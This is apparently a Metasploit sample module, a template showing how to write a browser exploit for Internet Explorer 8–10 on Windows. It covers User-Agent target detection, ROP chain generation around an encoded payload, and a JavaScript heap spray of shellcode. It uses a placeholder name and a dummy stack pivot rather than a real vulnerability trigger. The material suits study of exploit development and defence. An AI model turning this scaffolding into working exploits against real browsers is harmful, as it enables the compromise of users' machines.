## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## ### # # This exploit sample demonstrates how a typical browser exploit is written using commonly # used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray. # ### class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn # Set :classid and :method for ActiveX exploits. For example: # :classid => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}", # :method => "SetShapeNodeType", autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "8.0", :ua_maxver => "10.0", :javascript => true, :os_name => OperatingSystems::Match::WINDOWS, :rank => NormalRanking }) def initialize(info={}) super(update_info(info, 'Name' => "Module Name", 'Description' => %q{ This template covers IE8/9/10, and uses the user-agent HTTP header to detect the browser version. Please note IE8 and newer may emulate an older IE version in compatibility mode, in that case the module won't be able to detect the browser correctly. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r' ], 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre } ], [ 'IE 9 on Windows 7', { 'Rop' => :jre } ], [ 'IE 10 on Windows 8', { 'Rop' => :jre } ] ], 'Payload' => { 'BadChars' => "\x00", # js_property_spray 'StackAdjustment' => -3500 }, 'Privileged' => false, 'DisclosureDate' => "Apr 1 2013", 'DefaultTarget' => 0)) end def get_target(agent) return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' when '6.2' os_name = 'Windows 8' when '6.3' os_name = 'Windows 8.1' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) return t end end nil end def get_payload(t) stack_pivot = "\x41\x42\x43\x44" code = payload.encoded case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) end rop_payload end def get_html(t) js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch)) html = %Q| <script> #{js_property_spray} var s = unescape("#{js_p}"); sprayHeap({shellcode:s}); </script> | html.gsub(/^\t\t/, '') end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("Requesting: #{request.uri}") target = get_target(agent) if target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end print_status("Target selected as: #{target.name}") html = get_html(target) send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' }) end end